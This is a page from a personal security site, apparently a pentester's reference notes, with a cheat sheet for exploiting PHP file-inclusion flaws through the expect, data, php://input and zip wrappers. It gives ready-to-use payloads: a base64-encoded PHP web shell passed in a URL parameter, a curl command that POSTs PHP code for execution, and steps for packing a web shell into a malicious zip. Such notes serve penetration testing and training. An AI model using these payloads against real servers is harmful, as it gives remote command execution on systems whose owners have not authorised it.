Robert H. Osborne
  • Home
    • The B.T.P.S Sec Pack
    • YouTube Channel
    • Certifications
    • HTB Profile
    • PS Gallery
    • BHack 2020 Presentation
    • Securing LDAP over SSL
    • Securing FTPS Windows
    • Securing WinRM over HTTPS
    • Securing FTPS Linux
    • Securing DNS
    • Securing SSH
    • Learning Vim
    • Learn Tmux
    • Learn Windows Terminal
    • Learn ConEmu
    • Not Intutive PS Behavior
    • Searching Event Logs
    • Write PowerShell Cmdlets
    • POO (Endgame)
    • Xen (Endgame)
    • Feline
    • Jewel
    • Doctor
    • Worker
    • Compromised
    • Omni
    • OpenKeyS
    • Unbalanced
    • SneakyMailer
    • Buff
    • Intense
    • Fuse
    • Tabby
    • Blunder
    • Dyplesher
    • Cache
    • Blackfield
    • Travel
    • Admirer
    • Multimaster
    • Remote
    • Quick
    • Magic
    • Book
    • Traceback
    • Cascade
    • Sauna
    • ForwardSlash
    • ServMon
    • PalyerTwo
    • Nest
    • Monteverde
    • Resolute
    • Rope
    • Patents
    • Mango
    • Obscurity
    • OpenAdmin
    • Postman
    • Control
    • Traverxec
    • Registry
    • BankRobber
    • Sniper
    • Forest
    • Zetta
    • RE
    • Player
    • Smasher2
    • JSON
    • Scavenger
    • AI
    • Heist
    • Craft
    • BitLab
    • Wall
    • Writeup
    • Luke
    • Bastion
    • HelpLine
    • HackBack
    • Conceal
    • CTF
    • Querier
    • Friendzone
    • Fortune
    • Netmon
    • Get HTB Invite Code
    • Enumeration
    • Pivoting Proxies
    • File Transfer
    • PrivEsc
    • Credentials
    • Firewall
    • WiFi Password Cracking
    • SSDP Spoofing
    • Ettercap Spoofing
    • ARP and DNS Spoofing
    • PowerShell Tools
    • AppLocker Bypass
    • SUID Notes
    • PHP Wrappers
    • SQL Injections
    • Certificates
    • Chroot Jail
    • Services
    • Reverse Shells
    • TTY Shell
  • Privacy Policy
  • Contact Us
Robert H. Osborne
  • Home
  • Privacy Policy
  • Contact Us

PHP WRAPPERS

EXPECT WRAPPER

 PHP Wrappers
http://osbornepro.com/index.php?language=expect://id

DATA WRAPPER

echo '<?php system($_GET['cmd']); ?>' | base64

# Place above result into URI below

 http://osbornepro.com/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id 

INPUT WRAPPER

curl -s -X POST --data "<?php system('id'); ?>" "http://osbornepro.com/index.php?language=php://input" | grep uid

ZIP WRAPPER

sudo apt install phpX.Y-zip # Install tool

echo '<?php system($_GET['cmd']); ?>' > exec.php # Create payload

zip malicious.zip exec.php # Create the zip file

rm exec.php # Clean up now unneeded file


Next, copy malicious.zip to the webroot directory to simulate the upload. The files in the zip archive can be referenced using the # symbol, which should be URL-encoded in the request. For example, the URL 

http://osbornepro.com/index.php?language=zip://malicious.zip%23exec.php&cmd=id

can be used to include exec.php and then execute code using the cmd parameter. 

Copyright © 2020 Robert H. Osborne - OsbornePro LLC.

  • Privacy Policy

Cookie Policy

If accepted the cookies on this site are used for my own interest in who is viewing the site. I will not profit off of this information in any way.

DeclineAccept & Close